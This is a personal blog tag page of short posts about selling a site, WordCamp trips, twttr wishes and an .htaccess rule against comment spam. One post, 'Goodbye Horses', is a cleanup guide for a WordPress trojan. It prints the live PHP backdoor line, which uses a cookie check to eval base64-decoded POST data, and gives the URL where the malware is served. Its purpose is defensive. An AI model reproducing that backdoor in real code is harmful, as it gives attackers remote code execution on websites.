Jason Cosper

Tag: weblogging

  • Blog Days Are Over

    Earlier this morning I confirmed the domain transfers for something that I spent almost six years of my life on. A site that I both obsessed over and neglected terribly.

    As of 8 AM, Preshrunk is somebody else’s baby. Saying that is a real punch in the (emotional) dick, but at least I know it’s in good hands now.

    I’m not going to use this post to talk about why I sold the site. That’s already been covered in enough detail. All I really want to say is that I’m happy it went to a good home.

    Oh, I’m also happy that I can pay off a respectable chunk of our wedding loan — but that’s only because the interest rate is embarrassingly high.

    Hopefully I’ll have a little more time to post here now. Considering my track record tho, I wouldn’t hold my breath for that…

  • Goodbye Horses

    So I’ve been helping a few folks out with a Trojan that has been cropping up in a handful of WordPress installs as of late. Currently, it has been getting noticed by the good little girls and boys on Windows with virus scanners installed.  When visiting an infected site, most folks are being prompted to download: 

    http://gvatemal.biz/pfd/spl/pdf.pdf

    Don’t go there tho! The virus scanners identify the contents of that URL as JS:Packed-L, a packed JavaScript exploit.

    So how do you find out if your install has been hit?  Well, the ones I’ve been cleaning up all have the following bit of code right at the top of their main index.php

    <?php if(md5($_COOKIE['0bdcf3981272c15a'])=="23c8932280dcafe25c20c6d25c9c8660"){ eval(base64_decode($_POST['file'])); exit; } ?>

    If you see that floating around, get rid of it!  Once you’ve done that, clear out your site’s cache — if you’re using a caching plugin, that is — and you should be good to go.

    Should you not find that bit of code hanging around in your install’s index.php and there are people still complaining about it, I suggest getting shell access — so long as your web host is awesome and gives you that — and doing a recursive grep. At DreamHost, this is as easy as logging in and running:

    grep -R 0bdcf3981272c15a /home/user/example.com/*

    Of course you’ll want to replace “user” with your username and “example.com” with the domain — or folder if you broke from standard naming conventions — where WordPress is installed.  Give that command a few minutes to run and you should get a path of where that code snippet can be found.  All you have to do at that point is purge it and clear any cache you might have on your WP install.

    Of course, if you managed to get hit with this, it was because there was a hole in your WordPress install. Making sure your core install and plugins are up to date is always a great idea. I check mine daily — but even doing it once a week is better than most folks.

    All I’m saying is that you have to stay militant. Doing so will seriously prevent the headaches of having to deal with fixing this crap on a regular basis.

  • In Transit

    Heads up, SF peeps! This weekend I’ll be driving up to the Yay Area for WordCamp to rep both DreamHost and Preshrunk in an official capacity.

    As it stands, I’m driving up Friday night and crashing out at Frazier’s secret headquarters somewhere in the East Bay. Since I don’t like being part of the problem — or paying for parking — I’ll be taking as much public transit as I possibly can. So it’s handy that I managed to stumble upon these handy iPhone related Muni apps that use NextBus information. Now all I need is a native looking (i.e. pretty) trip planner and I’m all set. So… Does anybody know of one off the top of their heads — or am I stuck using 511.org over EDGE?

  • Productivity

    Damn. I’ve been a busy bee tonight…

    Sadly, I can’t remember the last time I pulled off that much stuff in an evening. All I know is that it feels good to be productive for a change. Perhaps I can manage to keep it up.

  • Attack Of The Comment Spam

    Something that’s been really grinding my gears lately is the amount of comment spam that I’ve been seeing in my moderation queue. Despite the fact that I use the very wonderful Akismet for WordPress, sometimes it can’t keep up with the flood coming down the proverbial tubes.

    Something’s that’s really helped is a little bit of .htaccess magic that one of my coworkers sent me. What it does is keep people from hitting your wp-comments-post.php unless they’re submitting the request from your server. Of course headers can be forged, but it’s really proven to be quite useful to me. Because of this, I thought I’d be a nice guy share it with y’all. Peep this…

    RewriteEngine On
    RewriteCond %{REQUEST_METHOD} POST
    RewriteCond %{REQUEST_URI} .wp-comments-post\.php*
    RewriteCond %{HTTP_REFERER} !.*yourdomain.com.* [OR]
    RewriteCond %{HTTP_USER_AGENT} ^$
    RewriteRule (.*) ^http://%{REMOTE_ADDR}/$ [R=301,L]

    Naturally, you’re going to want to replace “yourdomain.com” with your actual domain — but other than that, it’s ready to go. Since I spend a lot of my day helping folks troubleshoot their WordPress installs and .htaccess rules, I’d really dig it if you’d refrain from asking questions. That’s right, this spot of code is supplied “as is”, kids.

    Enjoy!

  • A Burgeoning Movement

    Would anybody care that much if I migrated this site to the much easier to spell — but nowhere near as creatively named — jasoncosper.com? Right now it’s mirroring this site, but I was actually thinking of doing a move in the near future.

    I’d be sure to update the feed URLs with all of the proper redirects and keep Ono Sendai live for at least the next year if I did manage to migrate it over. Still, I thought I’d ask the half a dozen readers that I have before doing it… ;)

    Update: *shrug* Fuck it, I’ve officially moved. All of your old feed URLs should work for the time being.

  • OPMLosAngeles

    So I was just thinking — it wouldn’t be an altogether horrible idea to get together an OPML or XOXO list of the BarCamp Los Angeles crew’s blogs, would it?

    If someone wants to work with me on getting this done, let me know!

  • Travel Sick

    After spending seven and a half hours on the road — three of which were in LA traffic I might add1 — I’m set up on the fold out at Frazier’s downright palatial Oaktown lair.

    Tomorrow is WordCamp, where Frazier and I will will be representing Hipster Mafia2. What that means is him and I are going to go to assorted talks and I’m going to give out business cards and act like a wanker3.

    If you see me in the hall and want to say hello or throw rotten fruit, walk over and do so.

    I’ll try to update a few times tomorrow as I sit in the sessions — but you know how it goes with me and promising to make updates, right? ;)

    1. OC to SF by way of Culver City is not something I’d call fun. But that 30 mile, one and a half hour detour netted me $130 and helped me get rid of my Sidekick II.
    2. That basically means Preshrunk — but we might have another property someday soon.
    3. Hopefully Arrington or Calacanis don’t magically appear and out-wanker me. That’d make me sad.

  • My Twttr Ponies

    Like any good internet beta whore, I just started using twttr. And while it’s pretty cool and rather promising, there are a few things that I really wish it had…

    1. For starters, a simple JavaScript based badge would be nice. While Flash is nice for some things, I really don’t think I need to load it to tell the world I’m having a beer or going on a walk. Also, it’d be nice if I didn’t have to recode my template to fit it in.
    2. RSS/Atom feeds wouldn’t hurt either. I know it’s supposed to be mobile phone based, but it really would be nice if I could give my feed out to folks instead of making them use twttr’s service to follow me around. Keeping track of my friends would be much less irritating too… ;)
    3. The ability to turn off “update sent” notices being sent to your phone. Yeah, I know I just sent an update. I appreciate that you want to let me know that my friends got my message and everything, but that’s really sort of unnecessary. Well, at least I think it is. *shrug*

    I’m really not trying to be a curmudgeon, honest. I just think that this stuff would take twttr from being a novel application to something I actually use frequently.

    P.S. Like, OMG! Add me!
    P.P.S. According to Jack — who happens to be the dude behind twttr — ponies #1 and #2 are already being worked on. Hooray!
    P.P.P.S. What’s more, pony #3 is a non issue. Apparently the “update sent” message only gets sent to your phone on your first message. Sweet!

  • Why Bloggers Love Handheld Computers

    Why Bloggers Love Handheld Computers

    While it may not be a handheld computer per se, this is the exact reason I bought a Sidekick.

    Oh Drew, you sure do have my number…